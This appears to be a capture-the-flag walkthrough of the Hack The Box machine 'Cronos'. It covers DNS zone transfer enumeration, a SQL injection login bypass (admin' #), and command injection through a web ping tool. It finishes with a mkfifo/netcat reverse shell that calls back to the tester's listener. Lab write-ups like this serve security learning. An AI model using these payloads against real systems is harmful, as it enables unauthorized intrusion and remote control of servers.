3 :53 dns

# to find out domain name for this machine
$ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

# using zone transfer to find out the different hostnames
$ host -l cronos.htb 10.10.10.13
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.15-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 248 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Wed Aug 04 21:22:15 PDT 2021
;; XFR size: 7 records (messages 1, bytes 203)

# adding all to /etc/hosts

http://admin.cronos.htb/
Login Page

Using sqli authentication bypass cheatsheet,
admin' #
# worked

http://admin.cronos.htb/welcome.php
# Net Tool v0.1
# Traceroute and ping
# ping is seen via tcpdump

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
21:39:00.546026 IP cronos.htb > 10.10.16.161: ICMP echo request, id 15926, seq 1, length 64
21:39:00.546044 IP 10.10.16.161 > cronos.htb: ICMP echo reply, id 15926, seq 1, length 64

# so the tool is running a terminal command, lets see if we can concatenate commands

traceroute 8.8.8.8;whoami;id;hostname
# gives us
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cronos

# reverse shell time
traceroute 8.8.8.8; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 37930
bash: cannot set terminal process group (1372): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$

Last updated